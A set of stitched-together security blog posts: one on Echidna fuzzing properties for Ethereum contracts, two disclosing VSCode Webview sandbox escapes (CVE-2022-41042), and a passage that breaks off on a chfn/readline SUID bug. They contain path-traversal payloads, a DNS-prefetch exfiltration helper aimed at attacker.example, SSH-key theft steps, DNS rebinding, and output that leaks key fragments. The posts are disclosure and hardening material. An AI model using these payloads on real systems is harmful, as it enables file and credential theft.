Reusable properties for Ethereum contracts

As smart contract security constantly evolves, property-based fuzzing has become a go-to technique for developers and security engineers. This technique relies on the creation of code properties – often called invariants – which describe what the code is supposed to do. To help the community define properties, we are releasing a set of 168 pre-built properties that can be used to guide Echidna, our smart contract fuzzing tool, or directly through unit tests. Properties covered include compliance with the most common ERC token interfaces, generically testable security properties, and properties for testing fixed point math operations.

Since mastering these tools takes time and practice, we will be holding two livestreams on our Twitch and YouTube channels that will provide hands-on experience with these invariants:

  • March 7 – ERC20 properties, example usage, and Echidna cheat codes (Guillermo Larregay)
  • March 14 – ERC4626 properties, example usage, and tips on fuzzing effectively (Benjamin Samuels)

Why should I use this?

The repository and related workshops will demonstrate how fuzzing can provide a much higher level of security assurance than unit tests alone. This collection of properties is simple to integrate with projects that use well-known standards or commonly used libraries. This release contains tests for the ERC-20 token standard, the ERC-4626 tokenized vaults standard, and the ABDKMath64x64 fixed-point math library:


ERC-20:

  • Properties for standard interface functions
  • Inferred sanity properties (ex: no user balance should be greater than the token supply)
  • Properties for extensions such as burnable, mintable, and pausable tokens


ERC-4626:

  • Properties that verify rounding directions are compliant with the spec
  • Reversion properties for functions that must never revert
  • Differential testing properties (ex: deposit() must match the behavior predicted by previewDeposit())
  • Functionality properties (ex: redeem() deducts shares from the correct account)
  • Non-spec security properties (share inflation attacks, token approval checks, etc.)


ABDKMath64x64:

  • Commutative, associative, distributive, and identity properties for relevant functions
  • Differential testing properties (ex: 2^(-x) == 1/2^(x))
  • Reversion properties for functions that should revert for certain ranges of input
  • Negative reversion properties for functions that should not revert for certain ranges of input
  • Interval properties (ex: min(x,y) <= avg(x,y) <= max(x,y))
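
To make the shape of such properties concrete, here is a minimal JavaScript sketch of the commutative and interval checks (the real properties in the repository are Solidity contracts driven by Echidna; everything here is illustrative):

```javascript
// Minimal property-based checks in the spirit of the properties above:
// generate random inputs and assert that the property holds for each one.
const min = (x, y) => Math.min(x, y);
const max = (x, y) => Math.max(x, y);
const avg = (x, y) => (x + y) / 2;

function checkProperties(trials = 1000) {
  for (let i = 0; i < trials; i++) {
    const x = Math.floor(Math.random() * 1e6);
    const y = Math.floor(Math.random() * 1e6);
    // Commutative property: x + y == y + x
    if (x + y !== y + x) throw new Error(`commutativity failed: ${x}, ${y}`);
    // Interval property: min(x,y) <= avg(x,y) <= max(x,y)
    if (!(min(x, y) <= avg(x, y) && avg(x, y) <= max(x, y))) {
      throw new Error(`interval property failed: ${x}, ${y}`);
    }
  }
  return true;
}
```

Echidna does the same thing at a much larger scale, generating sequences of contract transactions instead of plain integers.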

The goal of these properties is to detect vulnerabilities or deviations from expected results, ensure adherence to standards, and provide guidance to developers writing invariants. By following this workshop, developers will be able to identify complex security issues that cannot be detected with conventional unit and parameterized tests. Furthermore, using this repository will enable developers to focus on deeper systemic issues instead of wasting time on low-hanging fruit.

As a bonus, while creating and testing these properties, we found a bug in the ABDKMath64x64 library: for a specific range of inputs to the divuu function, an assertion could be triggered in the library. More information about the bug, from one of the library's authors, can be found here.

Do It Yourself!

If you don’t want to wait for the livestream, you can get started right now. Here’s how to add the properties to your own repo:

  • Install Echidna.
  • Import the properties into your project:
    • If you use Hardhat: npm install @crytic/properties or yarn add @crytic/properties
    • If you use Foundry: forge install crytic/properties
  • Create a test contract according to the documentation.

Let’s say you want to create a new ERC20 contract called YetAnotherCashEquivalentToken, and check that it is compliant with the standard. Following the previous steps, you create the following test contract for performing an external test:

pragma solidity ^0.8.0;

import "./path/to/YetAnotherCashEquivalentToken.sol";
import {ICryticTokenMock} from "@crytic/properties/contracts/ERC20/external/util/ITokenMock.sol";
import {CryticERC20ExternalBasicProperties} from "@crytic/properties/contracts/ERC20/external/properties/ERC20ExternalBasicProperties.sol";
import {PropertiesConstants} from "@crytic/properties/contracts/util/PropertiesConstants.sol";

contract CryticERC20ExternalHarness is CryticERC20ExternalBasicProperties {
    constructor() {
        // Deploy ERC20
        token = ICryticTokenMock(address(new CryticTokenMock()));
    }
}

contract CryticTokenMock is YetAnotherCashEquivalentToken, PropertiesConstants {
    bool public isMintableOrBurnable;
    uint256 public initialSupply;

    constructor() {
        _mint(USER1, INITIAL_BALANCE);
        _mint(USER2, INITIAL_BALANCE);
        _mint(USER3, INITIAL_BALANCE);
        _mint(msg.sender, INITIAL_BALANCE);

        initialSupply = totalSupply();
        isMintableOrBurnable = false;
    }
}

Then, a configuration file is needed to set the fuzzing parameters for Echidna:

corpusDir: "tests/crytic/erc20/echidna-corpus-internal"
testMode: assertion
testLimit: 100000
deployer: "0x10000"
sender: ["0x10000", "0x20000", "0x30000"]
multi-abi: true

Finally, run Echidna on the test contract:

echidna-test . --contract CryticERC20ExternalHarness --config tests/echidna-external.yaml

Furthermore, this effort is ongoing. Some ideas for future work include:

  • Test more of the widely-used mathematical libraries with our properties, such as PRBMath (properties/issues/2).
  • Add tests for more ERC standards (properties/issues/5).
  • Create a corpus of tests for other commonly used functions or contracts that are not standards, such as AMMs or liquidity pools (properties/issues/4).

Escaping well-configured VSCode extensions (for profit)

By Vasco Franco

In part one of this two-part series, we escaped Webviews in real-world misconfigured VSCode extensions. But can we still escape extensions if they are well-configured?

In this post, we’ll demonstrate how I bypassed a Webview’s localResourceRoots by exploiting small URL parsing differences between the browser (i.e., the Electron-created Chromium instance in which VSCode and its Webviews run) and other VSCode logic, combined with an over-reliance on the browser to perform path normalization. This bypass allows an attacker with JavaScript execution inside a Webview to read files anywhere on the system, including those outside the localResourceRoots. Microsoft assigned this bug CVE-2022-41042 and awarded us a bounty of $7,500 (about $2,500 per minute of bug finding).

Finding the issue

While exploiting the vulnerabilities detailed in the last post, I wondered if there could be bugs in VSCode itself that would allow us to bypass any security feature that limits what a Webview can do. In particular, I was curious if we could still exploit the bug we found in the SARIF Viewer extension (vulnerability 1 in part 1) if there were stricter rules in the Webview’s localResourceRoots option.

From last post’s SARIF viewer exploit, we learned that you can always exfiltrate files using DNS prefetches if you have the following preconditions:

  • You can execute JavaScript in a Webview. This enables you to add link tags to the DOM.
  • The CSP’s connect-src directive has the source. This enables you to fetch local files.

…Files within the localResourceRoots folders, that is! This option limits the folders from which a Webview can read files, and, in the SARIF viewer, it was configured to limit, well… nothing. But such a permissive localResourceRoots is rare. Most extensions only allow access to files in the current workspace and in the extensions folder (the default values for the localResourceRoots option).

Recall that Webviews read files by fetching the “fake” domain, as shown in the example below.

Example of how to fetch a file from a VSCode extension Webview

Without even looking at how the code enforced the localResourceRoots option, I started playing around with different path traversal payloads with the goal of escaping from the root directories where we are imprisoned. I tried a few payloads, such as:

  • /etc/passwd
  • /../../../../../etc/passwd
  • /[valid_root]/../../../../../etc/passwd

As I expected, this didn’t work. The browser normalized the request’s path even before it reached VSCode, as shown in the image below.

Unsuccessful fetches of the /etc/passwd file

I started trying different variants that the browser would not normalize, but that some VSCode logic might consider a valid path. In about three minutes, to my surprise, I found out that using %2f.. instead of /.. allowed us to escape the root folder(!!!).

Successful fetch of the /etc/passwd file when using the / character URL encoded as %2f

We’ve escaped! We can now fetch files from anywhere in the filesystem. But why did this work? VSCode seems to decode the %2f, but I couldn’t really understand what was happening under the hood. My initial assumption was that the function that reads the file (e.g., the fs.readFile function) was decoding the %2f, while the path normalization function did not. As we’ll see, this was not a bad guess, but not quite the real cause.

Root cause analysis

Let’s start from the beginning and see how VSCode handles requests—remember, this is not a real domain.

It all starts in the service worker running on the Webview. This service worker intercepts every Webview’s request to the domain and transforms it into a postMessage('load-resource') to the main VSCode thread.

Code from the Webview’s service worker that intercepts fetch requests and transforms them into a postMessage to the main VSCode thread (source)

VSCode will handle the postMessage('load-resource') call by building a URL object and calling loadResource, as shown below.

VSCode code that handles a load-resource postMessage. Highlighted in red is the code that decodes the fetched path—the first reason why our exploit works. (source)

Notice that the URL path is decoded with decodeURIComponent. This is why our %2f is decoded! But this alone still doesn’t explain why the path traversal works. Normalizing the path before checking if the path belongs to one of the roots would prevent our exploit. Let’s keep going.

The loadResource function simply calls loadLocalResource with roots: localResourceRoots.

The loadResource function calling loadLocalResource with the localResourceRoots option (source)

Then, the loadLocalResource function calls getResourceToLoad, which will iterate over each root in localResourceRoots and check if the requested path is in one of these roots. If all checks pass, loadLocalResource reads and returns the file contents, as shown below.

Code that checks if a path is within the expected root folders and returns the file contents on success. Highlighted in red is the .startsWith check without any prior normalization—the second reason our exploit works. (source)

There is no path normalization, and the root check is done with resourceFsPath.startsWith(rootPath). This is why our path traversal works! If our path is [valid-root-path]/../../../../../etc/issue, we’ll pass the .startsWith check even though our path points to somewhere outside of the root.

In summary, two mistakes allow our exploit:

  • VSCode calls decodeURIComponent(path) on the path, decoding %2f to /. This allows us to bypass the browser’s normalization and introduce ../ sequences into the path.
  • The containsResource function checks that the requested file is within the expected localResourceRoots folder with the startsWith function without first normalizing the path (i.e., removing the ../ sequences). This allows us to traverse outside the root with a payload such as [valid-root-path]/../../../.

This bug is hard to spot by just manually auditing the code. The layers of abstraction and all the message passing mask where our data flows through, as well as some of the critical details that make the exploit work. This is why evaluating and testing software by executing the code and observing its behavior at runtime—dynamic analysis—is such an important part of auditing complex systems. Finding this bug through static analysis would require defining sources, sinks, sanitizers, and an interprocedural engine capable of understanding data that is passed in postMessage calls. After all that work, you may still end up with a lot of false positives and false negatives; we use static analysis tools extensively at Trail of Bits, but they’re not the right tool for this job.

Recommendations for preventing path traversals

In the last blog’s third vulnerability, we examined a path traversal vulnerability caused by parsing a URL’s query string with flawed hand-coded logic that allowed us to circumvent the path normalization done by the browser. These bugs are very similar; in both cases, URL parsing differences and the reliance on the browser to do path normalization resulted in path traversal vulnerabilities with critical consequences.

So, when handling URLs, we recommend following these principles:

  • Parse the URL from the path with an appropriate object (e.g., JavaScript’s URL class) instead of hand-coded logic.
  • Do not transform any URL components after normalization unless there is a very good reason to do so. As we’ve seen, even decoding the path with a call to decodeURIComponent(path) was enough to fully bypass the localResourceRoots feature, since other parts of the code assumed that the browser had already normalized the path. If you want to read more about URL parsing discrepancies and how they can lead to critical bugs, I recommend reading A New Era of SSRF by Orange Tsai and Exploiting URL Parsing Confusion.
  • Always normalize the file path before checking if the file is within the expected root. Doing both operations together, ideally in the same encapsulated function, ensures that no future or existing code will transform the path in any way that invalidates the normalization operation.


Timeline

  • September 7, 2022: Reported the bug to Microsoft.
  • September 16, 2022: Microsoft confirmed the behavior and mentioned that the case was being reviewed for a possible bounty award.
  • September 20, 2022: Microsoft marked the report as out-of-scope for a bounty because “VS code extensions are not eligible for bounty award.”
  • September 21, 2022: I replied, noting that the bug is in the way VSCode interacts with extensions, not in a VSCode extension.
  • September 24, 2022: Microsoft acknowledged the mistake and awarded the bug a $7,500 bounty.
  • October 11, 2022: Microsoft fixed the bug in PR #163327 and assigned it CVE-2022-41042.

Escaping misconfigured VSCode extensions

By Vasco Franco

TL;DR: This two-part blog series will cover how I found and disclosed three vulnerabilities in VSCode extensions and one vulnerability in VSCode itself (a security mitigation bypass assigned CVE-2022-41042 and awarded a $7,500 bounty). We will identify the underlying cause of each vulnerability and create fully working exploits to demonstrate how an attacker could have compromised your machine. We will also recommend ways to prevent similar issues from occurring in the future.

A few months ago, I decided to assess the security of some VSCode extensions that we frequently use during audits. In particular, I looked at two Microsoft extensions: SARIF viewer, which helps visualize static analysis results, and Live Preview, which renders HTML files directly in VSCode.

Why should you care about the security of VSCode extensions? As we will demonstrate, vulnerabilities in VSCode extensions—especially those that parse potentially untrusted input—can lead to the compromise of your local machine. In both the extensions I reviewed, I found a high-severity bug that would allow an attacker to steal all of your local files. With one of these bugs, an attacker could even steal your SSH keys if you visited a malicious website while the extension is running in the background.

During this research, I learned about VSCode Webviews—sandboxed UI panels that run in a separate context from the main extension, analogous to an iframe in a normal website—and researched avenues to escape them. In this post, we’ll dive into what VSCode Webviews are and analyze three vulnerabilities in VSCode extensions, two of which led to arbitrary local file exfiltration. We will also look at some interesting exploitation tricks: leaking files using DNS to bypass restrictive Content-Security-Policy (CSP) policies, using srcdoc iframes to execute JavaScript, and using DNS rebinding to elevate the impact of our exploits.

In an upcoming blog post, we’ll examine a bug in VSCode itself that allows us to escape a Webview’s sandbox even in a well-configured extension.

VSCode Webviews

Before diving into the bugs, it’s important to understand how a VSCode extension is structured. VSCode is an Electron application with privileges to access the filesystem and execute arbitrary shell commands; extensions have all the same privileges. This means that if an attacker can execute JavaScript (e.g., through an XSS vulnerability) in a VSCode extension, they can achieve a full compromise of the system.

As a defense-in-depth protection against XSS vulnerabilities, extensions have to create UI panels inside sandboxed Webviews. These Webviews don’t have access to the NodeJS APIs, which allow the main extension to read files and run shell commands. Webviews can be further limited with several options:

  • enableScripts: prevents the Webview from executing JavaScript if set to false. Most extensions require enableScripts: true.
  • localResourceRoots: prevents Webviews from accessing files outside of the directories specified in localResourceRoots. The default is the current workspace directory and the extension’s folder.
  • Content-Security-Policy: mitigates the impact of XSS vulnerabilities by limiting the sources from which the Webview can load content (images, CSS, scripts, etc.). The policy is added through a meta tag of the Webview’s HTML source, such as:
     <meta http-equiv="Content-Security-Policy" content="default-src 'none';">

Sometimes, these Webview panels need to communicate with the main extension to pass some data or ask for a privileged operation that they cannot perform on their own. This communication is achieved by using the postMessage() API.

Below is a simple, commented example of how to create a Webview and how to pass messages between the main extension and the Webview.

Example of a simple extension that creates a Webview

An XSS vulnerability inside the Webview should not lead to a compromise if the following conditions are true: localResourceRoots is correctly set up, the CSP correctly limits the sources from which content can be loaded, and no postMessage handler is vulnerable to problems such as command injection. Still, you should not allow arbitrary execution of untrusted JavaScript inside a Webview; these security features are in place as a defense-in-depth protection. This is analogous to how a browser does not allow a renderer process to execute arbitrary code, even though it is sandboxed.

You can read more about Webviews and their security model in VSCode’s documentation for Webviews.

Now that we understand Webviews a little better, let’s take a look at three vulnerabilities that I found during my research and how I was able to escape Webviews and exfiltrate local files in two VSCode extensions built by Microsoft.

Vulnerability 1: HTML/JavaScript injection in Microsoft’s SARIF viewer

Microsoft’s SARIF viewer is a VSCode extension that parses SARIF files—a JSON-based file format into which most static analysis tools output their results—and displays them in a browsable list.

Since I use the SARIF viewer extension in all of our audits to triage static analysis results, I wanted to know how well it was protected against loading untrusted SARIF files. These untrusted files can be downloaded from an untrusted source or, more likely, result from running a static analysis tool—such as CodeQL or Semgrep—with a malicious rule containing metadata that can manipulate the resulting SARIF file (e.g., the finding’s description).

While examining the code where the SARIF data is rendered, I came across a suspicious-looking snippet in which the description of a static analysis result is rendered using the ReactMarkdown class with the escapeHtml option set to false.

Code that unsafely renders the description of a finding parsed from a SARIF file (source)

Since HTML is not escaped, by controlling the markdown field of a result’s message, we can inject arbitrary HTML and JavaScript into the Webview. I quickly put together a proof of concept (PoC) that automatically executed JavaScript using the onerror handler of an img tag with an invalid source.

Portion of a SARIF file that triggers JavaScript execution in the SARIF Viewer extension

It worked! The picture below shows the exploit in action.

PoC exploit in action. On the right, we see the JavaScript injected in the DOM. On the left, we see where it is rendered.

This was the easy part. Now, we need to weaponize this bug by fetching sensitive local files and exfiltrating them to our server.

Fetching local files

Our HTML injection is inside a Webview, which, as we saw, is limited to reading files inside its localResourceRoots. The Webview is created with the following code:

Code that creates the Webview in the SARIF viewer extension with an unsafe localResourceRoots option (source)

As we can see, localResourceRoots is configured very poorly. It allows the Webview to read files from anywhere on the disk, up to the z: drive! This means that we can just read any file we want—for example, a user’s private key at ~/.ssh/id_rsa.

Inside the Webview, we cannot open and read a file directly since we don’t have access to NodeJS APIs. Instead, we fetch the file through the “fake” domain we saw earlier, and the file contents are sent in the response (if the file exists and is within the localResourceRoots path).

To leak /etc/issue, all we need is to make the following fetch:

Example of code that reads the /etc/issue file inside a Webview

Exfiltrating files

Now, we just need to send the file contents to our remote server. Normally, this would be easy; we would make a fetch to a server we control with the file’s contents in the POST body or in a GET parameter (e.g., fetch('')).

However, the Webview has a fairly restrictive CSP. In particular, the connect-src directive restricts fetches to self and https://*. Since we don’t control either source, we cannot make fetches to our attacker-controlled server.

CSP of the SARIF viewer extension’s Webview (source)

We can circumvent this limitation with, you guessed it, DNS! By injecting link tags with the rel="dns-prefetch" attribute, we can leak file contents in subdomains even with the restrictive CSP connect-src directive.

Example of HTML code that leaks files using DNS to circumvent a restrictive CSP

To leak the file, all we need to do is encode the file in hex and inject link tags into the DOM, where each href points to our attacker-controlled server with the encoded file contents in the subdomains. We just need to ensure that each DNS label has at most 63 characters and that the whole domain name stays under the 253-character limit.
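
The encoding step can be sketched in JavaScript (the domain and helper name are mine; the 63-character label and 253-character name limits come from the DNS specification):

```javascript
// Encode file contents as hex and pack them into DNS labels for exfiltration
// via dns-prefetch links. Per RFC 1035, each label is at most 63 characters
// and a full domain name at most 253. Names here are illustrative.
function buildExfilDomains(contents, attackerDomain = 'attacker.example') {
  const hex = Buffer.from(contents, 'utf8').toString('hex');
  const labels = hex.match(/.{1,63}/g) || [];
  const domains = [];
  let current = [];
  for (const label of labels) {
    // Pack as many labels per domain as the 253-character limit allows.
    const candidate = [...current, label, attackerDomain].join('.');
    if (candidate.length > 253 && current.length > 0) {
      domains.push([...current, attackerDomain].join('.'));
      current = [label];
    } else {
      current.push(label);
    }
  }
  if (current.length) domains.push([...current, attackerDomain].join('.'));
  return domains; // each becomes <link rel="dns-prefetch" href="//{domain}">
}
```

The attacker’s DNS server then reassembles the hex-encoded chunks from the queries it receives.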

Putting it all together

By combining these techniques, we can build an exploit that exfiltrates the user’s $HOME/.ssh/id_rsa file. Here is the commented exploit:

Exploit that steals a user’s private key when they open a compromised SARIF file in the SARIF viewer extension

This was all possible because the extension used the ReactMarkdown component with the escapeHtml = {false} option, allowing an attacker with partial control of a SARIF file to inject JavaScript in the Webview. Thanks to a very permissive localResourceRoots, the attacker could take any file from the user’s filesystem. Would this vulnerability still be exploitable with a stricter localResourceRoots? Wait for the second blog post! ;)

To detect these issues automatically, we improved Semgrep’s existing ReactMarkdown rule in PR #2307. Try it out against React codebases with semgrep --config "p/react".

Vulnerability 2: HTML/JavaScript injection in Microsoft’s Live Preview extension

Microsoft’s Live Preview, a VSCode extension with more than 1 million installs, allows you to preview HTML files from your current workspace in an embedded browser directly in VSCode. I wanted to understand if I could safely preview malicious HTML files using the extension.

The extension starts by creating a local HTTP server on port 3000, where it hosts the current workspace directory and all of its files. Then, to render a file, it creates an iframe that points to the local HTTP server (e.g., <iframe src="http://localhost:3000/file.html">) inside a Webview panel. (Sandboxing inception!) This architecture allows the file to execute JavaScript without affecting the main Webview.

The inner preview iframe and the outer Webview communicate using the postMessage API. If we want to inject HTML/JavaScript in the Webview, its postMessage handlers are a good place to start!

Finding an HTML/JavaScript injection

We don’t have to look hard! The link-hover-start handler is vulnerable to HTML injection because it directly passes input from the iframe message (whose contents we control) to the innerHTML attribute of a Webview element without any sanitization. This allows an attacker to control part of the Webview’s HTML.

Code where the innerHTML of a Webview element is set to the contents of a message that originated in the HTML file being previewed (source)

Achieving JavaScript execution with srcdoc iframes

The naive approach of setting innerHTML to

 <script> console.log('HELLO'); </script> 

does not work because the script is added to the DOM but does not get loaded. Thankfully, there’s a neat trick we can use to circumvent this limitation: writing the script inside an srcdoc iframe, as shown in the figure below.

PoC that uses an srcdoc iframe to trigger JavaScript execution when set to the innerHTML of a DOM element

The browser considers srcdoc iframes to have the same origin as their parent windows. So even though we just escaped one iframe and injected another, this srcdoc iframe will have access to the Webview’s DOM, global variables, and functions.
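
Here is a sketch of how such a payload can be built (the helper name is mine):

```javascript
// Build a payload that, when assigned to innerHTML, yields script execution:
// the script is wrapped in an <iframe srcdoc=...>, which the browser DOES
// load, and which runs same-origin with the parent Webview.
function buildSrcdocPayload(script) {
  // The srcdoc value lives in an HTML attribute, so HTML-escape it first;
  // the browser decodes the entities when it parses the srcdoc document.
  const escaped = script
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
  return `<iframe srcdoc="${escaped}"></iframe>`;
}

// e.g., element.innerHTML = buildSrcdocPayload("<script>console.log('HELLO');</script>");
```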

The downside is that the iframe is now ruled by the same CSP as the Webview.

default-src 'none';
connect-src ws:// 'self';
font-src 'self' https://*;
style-src 'self' https://*;
script-src 'nonce-';
CSP of the Live Preview extension’s Webview (source)

In contrast with the first vulnerability, this CSP’s script-src directive does not include unsafe-inline; instead, it uses a nonce-based script-src. This means that we need to know the nonce to inject our arbitrary JavaScript. We have a few options to accomplish this: brute-force the nonce, recover the nonce due to poor randomness, or leak the nonce.

The nonce is generated with the following code:

Code that generates the nonce used in the CSP of the Live Preview extension’s Webview (source)

Brute-forcing the nonce

While we can try as many nonces as we please without repercussion, the nonce has a length of 64 with an alphabet of 62 characters, so the universe would end before we found the right one.

Recovering the nonce due to poor randomness

An astute reader might have noticed that the nonce-generating function uses Math.random, a cryptographically unsafe random number generator. Math.random uses the xorshift128+ algorithm behind the scenes, and, given X random numbers, we can recover the algorithm’s internal state and predict past and future random numbers. See, for example, the Practical Exploitation of Math.random on V8 conference talk, and an implementation of the state recovery.

My idea was to call Math.random repeatedly in our inner iframe and recover the state used to generate the nonce. However, the inner iframe, the outer Webview, and the main extension that created the random nonce each have their own instance of the internal algorithm state, so we cannot recover the nonce this way.

Leaking the nonce

The final option was to leak the nonce. I searched the Webview code for postMessage handlers that sent data into the inner iframe (the one we control) in the hopes that we could somehow sneak in the nonce.

Our best bet is the findNext function, which sends the value of the find-input element to our iframe.

Code that shows the Webview sending the contents of the find-input value to the previewed page (source)

My goal was to somehow make the Webview attach the nonce to a “fake” find-input element that we would inject using our HTML injection. I dreamed of injecting an incomplete element like <input id="find-input" value=", which would create a “fake” element with the find-input ID and open its value attribute without closing it. However, this was doomed to fail for multiple reasons. First, we cannot escape from the element whose innerHTML we are setting, and since we write that content in full, it could never contain the nonce. Second, the DOM parser does not parse the incomplete HTML above; our element is just left empty. Finally, document.getElementById('find-input') always finds the already existing element, not the one we injected.

At this point, I was at a dead end; the CSP effectively prevented the full exploit. But I wanted more! In the next vulnerability, we’ll look at another bug that I used to fully exploit the Live Preview extension without injecting any JavaScript in the Webview.

Vulnerability 3: Path traversal in the local HTTP server in Microsoft’s Live Preview extension

Since we couldn’t get around the CSP, I thought another interesting place to investigate was the local HTTP server that serves the HTML files to be previewed. Could we fetch arbitrary files from it or could we only fetch files in the current workspace?

The HTTP server will serve any file in the current workspace, allowing an HTML file to load JavaScript files or images in the same workspace. As a result, if you have sensitive files in your current workspace and preview a malicious HTML file in the same workspace, the malicious file can easily fetch and exfiltrate the sensitive files. But this is by design, and it is unlikely that a user’s workspace will have both malicious and sensitive files. Can we go further and leak files from elsewhere on the filesystem?

Below is a simplified version of the code that handles each HTTP request.

Code that serves requests in the Live Preview extension’s local HTTP server (source)

My goal was to find a path traversal vulnerability that would allow me to escape the basePath root.

Finding a path traversal bug

The simple approach of calling fetch("../../../../../../etc/passwd") does not work because the browser normalizes the request to fetch("/etc/passwd"). However, the server logic does not prevent this path traversal attack; the following cURL command retrieves the /etc/passwd file!

curl --path-as-is
cURL command that demonstrates that the server does not prevent path traversal attacks

This can’t be achieved through a browser, so this exploitation path is infeasible. However, I noticed slight differences in how the browser and the HTTP server parse the URL that may allow us to pull off our path traversal attack. The server uses hand-coded logic to parse the URL’s query string instead of using the JavaScript URL class, as shown in the snippet below.

Code with hand-coded logic to parse a URL’s query string (source)

This code splits the query string from the URL using lastIndexOf('?'). However, a browser will parse the query string starting from the first '?'. By fetching ?../../../../../../etc/passwd?AAA, the browser will not normalize the ../ sequences because they are part of the query string from the browser’s point of view (in green in the figure below). From the server’s point of view (in blue in the figure below), only AAA is part of the query string, so the URLPathName variable will be set to ?../../../../../../etc/passwd, and the full path will be normalized to /etc/passwd by path.join(basePath ?? '', URLPathName). We have a path traversal!

URL parsing differences between the browser and the server

Exploitation scenario 1

If an attacker controls a file that a user opens with the VSCode Live Preview extension, they can use this path traversal to leak arbitrary user files and folders.

In contrast with vulnerability 1, this exploit is quite straightforward. It follows these simple steps:

  1. From the HTML file being previewed, fetch the file or directory that we want to leak with fetch(""). (Note that we can see the fetch results even without a CORS policy because our exploit file is hosted on the same origin.)
  2. Encode the file contents in base64 with leaked_file_b64 = btoa(leaked_file).
  3. Send the encoded file to our attacker-controlled server with fetch("http://?q=" + leaked_file_b64).

Here is the commented exploit:

Exploit that exfiltrates local files when a user previews a malicious HTML file with the Live Preview extension

Exploitation scenario 2

The previous attack scenario works only if a user previews an attacker-controlled file, which makes it hard to pull off. But we can go further! Using DNS rebinding (a common technique to exploit unauthenticated internal services), we can increase the vulnerability’s impact by requiring only that the victim visit an attacker’s website while the Live Preview HTTP server is running in the background.

In a DNS rebinding attack, an attacker alternates a domain’s DNS record between two IPs: the attacker server’s IP and the local server’s IP (commonly the loopback address). Then, by using JavaScript to fetch this changing domain, the attacker tricks the browser into accessing local servers without any CORS warnings, since the origin remains the same. For a more complete explanation of DNS rebinding attacks, see this blog post.

To set up our exploit, we’ll do the following:

  1. Host our attacker-controlled server with the exploit.
  2. Use the rbndr service with a domain that flips its DNS record between the two IPs.

(NOTE: If you want to reproduce this setup, ensure that running host on the rbndr domain alternates between the two IPs. This works flawlessly on my Linux machine with a public resolver as the DNS server.)

To steal a victim’s local files, we need to make them browse to the rbndr URL, hoping that it resolves to our server with the exploit. Then, our exploit page performs fetches with the path traversal attack in a loop until the browser makes a DNS request that resolves to the local IP; once it does, we get the content of the sensitive file. Here is the commented exploit:

Exploit that exfiltrates local files when a user visits a malicious web page while the Live Preview extension is running in the background

How to secure VSCode Webviews

Webviews have strong defaults and mitigations to minimize a vulnerability’s impact. This is great, and it totally prevented a full compromise in the case of vulnerability 2! However, these vulnerabilities also showed that extensions—even those built by Microsoft, the creators of VSCode—can be misconfigured. For example, vulnerability 1 is a glaring example of how not to set up the localResourceRoots option.

If you are building a VSCode extension and plan on using Webviews, we recommend following these principles:

  1. Restrict the CSP as much as possible. Start with default-src 'none' and add other sources only as needed. For the script-src directive, avoid using unsafe-inline; instead, use a nonce or hash-based source. If you use a nonce-based source, generate the nonce with a cryptographically strong random number generator (e.g., crypto.randomBytes(16).toString('base64')).
  2. Restrict the localResourceRoots option as much as possible. Preferably, allow the Webview to read only files from the extension’s installation folder.
  3. Ensure that any postMessage handlers in the main extension thread are not vulnerable to issues such as SQL injection, command injection, arbitrary file writes, or arbitrary file reads.
  4. If your extension runs a local HTTP server, minimize the risk of path traversal attacks by:
    • Parsing the URL from the path with an appropriate object (e.g., JavaScript’s URL class) instead of hand-coded logic.
    • Checking if the file is within the expected root after normalizing the path and right before reading the file.
  5. If your extension runs a local HTTP server, minimize the risk of DNS rebinding attacks by:
    • Spawning the server on a random port and using the Webview’s portMapping option to map the random localhost port to a static one in the Webview. This will limit an attacker’s ability to fingerprint if the server is running and make it harder for them to brute-force the port. It has the added benefit of seamlessly handling cases where the hard-coded port is in use by another application.
    • Allowlisting only localhost names and loopback addresses in the Host header (like CUPS does). Alternatively, authenticate the local server.
  6. And, of course, don’t flow user input into .innerHTML—but you already knew that one. If you’re trying to add text to an element, use .innerText instead.

If you follow these principles you’ll have a well-configured VSCode extension. Nothing can go wrong, right? In a second blog post, we’ll examine a bug in VSCode itself that allows us to escape a Webview’s sandbox even in a well-configured extension.


  • August 12, 2022: Reported vulnerability 1 to Microsoft
  • August 13–16, 2022: Vulnerability 1 was fixed in c054421 and 98816d9
  • September 7, 2022: Reported vulnerability 2 and 3 to Microsoft
  • September 14, 2022: Vulnerability 2 fixed in 4e029aa
  • October 5, 2022: Vulnerability 3 fixed in 9d26055 and 88503c4

Readline crime: exploiting a SUID logic bug

By roddux // Rory M

I discovered a logic bug in chfn’s readline dependency that partially reveals the contents of the file specified in the INPUTRC environment variable. This could allow attackers to move laterally on a box where sshd is running, a given user can log in, and that user’s private key is stored in a known location (/home/user/.ssh/id_rsa).

This bug was reported and patched back in February 2022, and chfn isn’t typically provided by util-linux anyway, so your boxen are probably fine. I’m writing about this because the exploit is amusing, as it’s made possible due to a happy coincidence of the readline configuration file parsing functions marrying up well to the format of SSH keys—explained further in this post.


$ INPUTRC=/root/.ssh/id_rsa chfn
Changing finger information for user.
readline: /root/.ssh/id_rsa: line 1: -----BEGIN: unknown key modifier
readline: /root/.ssh/id_rsa: line 2: b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn: no key sequence terminator


readline: /root/.ssh/id_rsa: line 37: avxwhoky6ozXEAAAAJcm9vdEBNQVRFAQI=: no key sequence terminator
readline: /root/.ssh/id_rsa: line 38: -----END: unknown key modifier
Office [b]: ^C

Finding the bug

I was recently enticed by SUID bugs after fawning over the Qualys sudo bug a while back. As I was musing through The Art of Software Security Assessment—vol. 2 wen?—I was spurred into looking at environment variables as an attack surface. With a couple of hours to kill, I threw an interposing library into /etc/ to log getenv calls:

#define _GNU_SOURCE
#include <dlfcn.h>
#include <syslog.h>

// gcc getenv.c -fPIC -shared -ldl -o

char *(*_real_getenv)(const char *) = 0;
char *getenv(const char *name) {
      if(!_real_getenv) _real_getenv = dlsym(RTLD_NEXT, "getenv");
      char *res = _real_getenv(name);
      syslog(1, "getenv(\"%s\") => \"%s\"\n", name, res);
      return res;
}
NB: We’re just going to pretend this is how I did it from the get-go, and that I didn’t waste time screwing around trying to get SUID processes launched under gdb.

With the logging library in place, I ran find / -perm /4000 (yes, I Googled the arguments) to find all of the SUID binaries on my system.

